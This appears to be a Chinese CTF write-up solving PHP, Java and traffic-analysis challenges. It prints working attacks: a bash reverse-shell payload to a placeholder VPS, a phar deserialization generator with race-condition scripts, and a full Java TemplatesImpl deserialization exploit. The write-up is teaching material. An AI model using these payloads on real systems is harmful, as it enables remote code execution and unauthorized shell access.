Web
warmup_php
查看主页源码如下
<?php
spl_autoload_register(function($class){
require("./class/".$class.".php");
});
highlight_file(__FILE__);
error_reporting(0);
$action = $_GET['action'];
$properties = $_POST['properties'];
class Action{
public function __construct($action,$properties){
$object=new $action();
foreach($properties as $name=>$value)
$object->$name=$value;
$object->run();
}
}
new Action($action,$properties);
?>
这里会自动注册class目录下的类文件,可以传入变量访问所有类文件下的run函数,同时还会设置成员变量值。
下载题目附件,查看class目录下所有php文件,可以发现Base.php下有
public function evaluateExpression($_expression_,$_data_=array())
{
if(is_string($_expression_))
{
extract($_data_);
return eval('return '.$_expression_.';');
}
else
{
$_data_[]=$this;
return call_user_func_array($_expression_, $_data_);
}
}
eval中的return是用字符串拼接的方式将变量拼起来的,这里可以构造
同时还可以发现,所有php下只有一个run方法
abstract class ListView extends Base
{
public $tagName='div';
public $template;
public function run()
{
echo "<".$this->tagName.">\n";
$this->renderContent();
echo "<".$this->tagName.">\n";
}
public function renderContent()
{
ob_start();
echo preg_replace_callback("/{(\w+)}/",array($this,'renderSection'),$this->template);
ob_end_flush();
}
protected function renderSection($matches)
{
$method='render'.$matches[1];
if(method_exists($this,$method))
{
$this->$method();
$html=ob_get_contents();
ob_clean();
return $html;
}
else
return $matches[0];
}
}
只要template
变量是{数字、字母}
组成的,那么就回调下面的renderSection函数,matches
就是templdate变量的值,由于TestView这个类继承了ListView这个抽象类。所以,如果实例化TestView类,上面的$this->method()
可以调用所有的以render开头的函数。这里直接定位到
public function renderTableBody()
{
$data=$this->data;
$n=count($data);
echo "<tbody>\n";
if($n>0)
{
for($row=0;$row<$n;++$row)
$this->renderTableRow($row);
}
else
{
echo '<tr><td colspan="'.count($this->columns).'" class="empty">';
echo "</td></tr>\n";
}
echo "</tbody>\n";
}
利用$this->renderTableRow()
调用evaluateExpression函数即可完成调用链。
public function renderTableRow($row)
{
$htmlOptions=array();
if($this->rowHtmlOptionsExpression!==null)
{
$data=$this->data[$row];
$options=$this->evaluateExpression($this->rowHtmlOptionsExpression,array('row'=>$row,'data'=>$data));
if(is_array($options))
$htmlOptions = $options;
}
GET传参实例化TestView类,再POST传参即可
properties[template]:{TableBody}
properties[rowHtmlOptionsExpression]:system("bash -c 'bash -i >& /dev/tcp/VPS/6666 0>&1'")
properties[data][0]:123
反弹shell读flag即可
soeasyphp
题目给出dockerfile
FROM php:7.2.3-fpm
COPY files /tmp/files/
COPY src /var/www/html/
COPY flag /flag
RUN chown -R root:root /var/www/html/ && \
chmod -R 755 /var/www/html && \
chown -R www-data:www-data /var/www/html/uploads && \
sed -i 's/deb.debian.org/mirrors.aliyun.com/g' /etc/apt/sources.list && \
sed -i '/security/d' /etc/apt/sources.list && \
apt-get update && \
apt-get install nginx -y && \
/bin/mv -f /tmp/files/default /etc/nginx/sites-available/default && \
gcc /tmp/files/copyflag.c -o /copyflag && \
chmod 4711 /copyflag && \
rm -rf /tmp/files && \
rm -rf /var/lib/apt/lists/* && \
chmod 700 /flag
CMD nginx&&php-fpm
EXPOSE 80
查看网页源代码,可以用png参数指向的文件覆盖uploads/head.png的内容。
<img width="50px" height="50px" src="uploads/head.png"/>
<br/>
<form action="upload.php" method="post" enctype="multipart/form-data">
<p><input type="file" name="file"></p>
<p><input type="submit" value="上传头像"></p>
</form>
<br/>
<form action="edit.php" method="post" enctype="application/x-www-form-urlencoded">
<p><input type="text" name="png" value="1.png" hidden="1"></p>
<p><input type="text" name="flag" value="flag{x}" hidden="1" ></p>
<!-- <p><input type="submit" value="更换头像"></p> -->
</form>
读取源码
//edit.php
<?php
ini_set("error_reporting","0");
class flag{
public function copyflag(){
exec("/copyflag"); //以root权限复制/flag 到 /tmp/flag.txt,并chown www-data:www-data/tmp/flag.txt
echo "SFTQL";
}
public function __destruct(){
$this->copyflag();
}
}
function filewrite($file,$data){
unlink($file);
file_put_contents($file, $data);
}
if(isset($_POST['png'])){
$filename = $_POST['png'];
if(!preg_match("/:|phar|\/\/|php/im",$filename)){
$f = fopen($filename,"r");
$contents = fread($f, filesize($filename));
if(strpos($contents,"flag{") !== false){
filewrite($filename,"Don't give me flag!!!");
}
}
if(isset($_POST['flag'])) {
$flag = (string)$_POST['flag'];
if ($flag == "Give me flag") {
filewrite("/tmp/flag.txt", "Don't give me flag");
sleep(2);
die("no no no !");
} else {
filewrite("/tmp/flag.txt", $flag);
}
$head = "uploads/head.png";
unlink($head);
if (symlink($filename, $head)) {
echo "鎴愬姛鏇存崲澶村儚";
} else {
unlink($filename);
echo "非正常文件,已被删除";
};
}
}
//upload.php
<?php
if (!isset($_FILES['file'])) {
die("璇蜂笂浼犲ご鍍�");
}
$file = $_FILES['file'];
$filename = md5("png".$file['name']).".png";
$path = "uploads/".$filename;
if(move_uploaded_file($file['tmp_name'],$path)){
echo "涓婁紶鎴愬姛锛� ".$path;
};
由于上面的代码有__destruct魔术方法和文件操作函数file_put_contents
和unlink
的参数可控,但整个代码里没有unserialize函数。所以自然想到利用phar反序列化
<?php
class flag{
public function copyflag(){
exec("/copyflag");
echo "SFTQL";
}
public function __destruct(){
$this->copyflag();
}
}
$a = new flag();
@unlink("phar.phar");
$phar = new Phar("phar.phar");
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>");
$phar->setMetadata($a);
$phar->addFromString("a.txt", "a");
$phar->stopBuffering();
?>
但是file_put_contents有过滤,就得调用unlink函数。file添加脏数据让symlink函数报错即可进入unlink函数,这时使用phar协议就可以读取到
import requests
url = "http://c2ea5fdd-954e-43e1-b5eb-6376940b2074.node4.buuoj.cn:81/"
sess = requests.Session()
sess.headers = {"content-type":"application/x-www-form-urlencoded"}
url1 = url + "edit.php"
data = {"png":"phar://uploads/d7eb04b5bf59f60ce50fa61dd63ccac9.png/"+"m"*6000,"flag":"flag"}
print(sess.post(url1,data).text)
这里需要让symlink函数报错,绕过symlink之后,flag就会被写入/tmp/flag.txt(注释里有写)。
但我们在读取/tmp/flag.txt时,后端又会将我们post传入的flag写入/tmp/flag.txt,从而覆盖掉flag,因此这里也需要条件竞争读取flag
import requests
import threading
sess = requests.session()
url = "http://c2ea5fdd-954e-43e1-b5eb-6376940b2074.node4.buuoj.cn:81/"
headurl = url + "uploads/head.png"
editurl = url + "edit.php"
def getFlag():
sess.post(editurl, data={"png": "/tmp/flag.txt", "flag": ""})
if __name__ == "__main__":
for s in range(50):
sess.post(editurl, data={"png":"phar://uploads/d7eb04b5bf59f60ce50fa61dd63ccac9.png/"+"m"*6000, "flag": ""})
t2 = threading.Thread(target=getFlag, args=())
t2.start()
while True:
flag = sess.get(headurl).text
if "flag" in flag:
print(flag)
break
warmup-java
反编译jar包,查看MyInvocationHandler类
import java.io.Serializable;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Method;
public class MyInvocationHandler implements InvocationHandler, Serializable {
private Class type;
public Object invoke(Object proxy, Method method, Object[] args) throws Throwable {
Method[] methods = this.type.getDeclaredMethods();
Method[] var5 = methods;
int var6 = methods.length;
for (int var7 = 0; var7 < var6; var7++) {
Method xmethod = var5[var7];
xmethod.invoke(args[0], new Object[0]);
}
return null;
}
}
可以看到这里使用动态代理InvocationHandler获取
动态代理https://www.bilibili.com/video/BV1WE411d7Dv?p=19
简单编写一下代码,看看invoke的触发和动态代理类的使用
public class Client {
public static void main(String[] args){
Utils utils = new Utils();
InvocationHandler invocationHandler = new MyInvocationHandler();
Class<?> cls = utils.getClass();
Object proxy = Proxy.newProxyInstance(cls.getClassLoader(), cls.getInterfaces(), invocationHandler);
System.out.println(proxy.getClass().getInterfaces().toString()+", ");
Method[] methods=proxy.getClass().getDeclaredMethods();
for(Method method:methods){
System.out.print(method.getName()+", ");
}
proxy.equals(null); //调用其他函数也会执行invoke方法,会有空指针异常
}
}
可以看到要是独自构造poc还是很难的
看看博客:https://forum.butian.net/share/1538
反编译出的代码加上构造函数,否则上面声明的type会报空指针
public MyInvocationHandler(Class type) {
this.type = type;
}
抄个payload
package com.example.warmup;
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import javassist.ClassClassPath;
import javassist.ClassPool;
import javassist.CtClass;
import org.apache.xalan.xsltc.compiler.Template;
import ysoserial.payloads.util.Reflections;
import javax.xml.transform.Templates;
import java.io.ByteArrayInputStream;
import java.io.ObjectInputStream;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.Proxy;
import java.math.BigInteger;
import java.util.*;
public class exp {
public static class StubTransletPayload extends AbstractTranslet {
public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
}
public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
}
}
public static void main(String[] args) throws Exception {
ClassPool pool = ClassPool.getDefault();
pool.insertClassPath((new ClassClassPath(StubTransletPayload.class)));
CtClass clazz = pool.get((StubTransletPayload.class.getName()));
String cmd = "java.lang.Runtime.getRuntime().exec(\"calc.exe\");";
clazz.makeClassInitializer().insertAfter(cmd);
clazz.setName("sp4c1ous");
TemplatesImpl tmplates = new TemplatesImpl();
setFieldValue(tmplates, "_bytecodes", new byte[][]{clazz.toBytecode()});
setFieldValue(tmplates, "_name", "HelloTemplatesTmpl");
setFieldValue(tmplates, "_tfactory", new TransformerFactoryImpl());
Field name = Reflections.getField(tmplates.getClass(), "_name");
Reflections.setAccessible(name);
Reflections.setFieldValue(tmplates, "_name", "s");
Reflections.setFieldValue(tmplates, "_tfactory", new TransformerFactoryImpl());
MyInvocationHandler s = new MyInvocationHandler(Templates.class);
Comparator comparator = (Comparator) Proxy.newProxyInstance(exp.class.getClassLoader(), new Class[]{Comparator.class}, s);
PriorityQueue<Object> queue = new PriorityQueue(2);
queue.add(1);
queue.add(1);
Object[] queueArray = (Object[]) (ysoserial.payloads.util.Reflections.getFieldValue(queue, "queue"));
queueArray[0] = tmplates;
Field field = Class.forName("java.util.PriorityQueue").getDeclaredField("comparator");
field.setAccessible(true);
field.set(queue, comparator);
System.out.print(Utils.objectToHexString(queue));
String data = Utils.objectToHexString(queue);
new ObjectInputStream(new ByteArrayInputStream(Utils.hexStringToBytes(data))).readObject();
}
public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
Field field = obj.getClass().getDeclaredField(fieldName);
field.setAccessible(true);
field.set(obj, value);
}
}
MISC
SimpleFlow
查看流量,找到最后拿到flag的报文
很容易发现是一个zip文件,ctrl shift X
导出对应zip文件分组字节流,去掉蚁剑添加的eb327956字段
找到报文段
解码字段Y2QgIi9Vc2Vycy9jaGFuZy9TaXRlcy90ZXN0Ijt6aXAgLVAgUGFTc1ppUFdvckQgZmxhZy56aXAgLi4vZmxhZy50eHQ7ZWNobyBbU107cHdkO2VjaG8gW0Vd
即可获得密码PaSsZiPWorD